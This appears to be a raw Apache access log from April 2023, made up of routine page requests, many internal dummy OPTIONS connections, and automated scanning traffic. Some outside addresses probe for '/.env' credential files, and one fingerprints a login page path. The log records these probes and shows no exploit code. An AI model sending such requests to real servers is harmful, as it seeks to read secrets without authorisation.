135.125.244.48 - - [06/Apr/2023:10:27:17 +0000] "POST / HTTP/1.1" 405 409723 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
151.235.247.17 - - [06/Apr/2023:10:38:23 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
43.158.217.205 - - [06/Apr/2023:10:52:28 +0000] "GET / HTTP/1.1" 200 8381 "-" "'Mozilla/5.0"
45.79.128.205 - - [06/Apr/2023:10:59:57 +0000] "\x16\x03\x01" 400 226 "-" "-"
193.32.162.159 - - [06/Apr/2023:11:22:19 +0000] "GET / HTTP/1.1" 200 8384 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.254.196.173 - - [06/Apr/2023:11:36:34 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [06/Apr/2023:11:36:35 +0000] "POST / HTTP/1.1" 405 409732 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [06/Apr/2023:11:38:02 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.244.48 - - [06/Apr/2023:11:51:53 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
135.125.244.48 - - [06/Apr/2023:11:51:54 +0000] "POST / HTTP/1.1" 405 409727 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
::1 - - [06/Apr/2023:11:57:30 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:31 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:32 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:33 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:34 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:35 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:36 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:37 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:38 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:39 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:40 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:44 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:45 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [06/Apr/2023:11:57:46 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
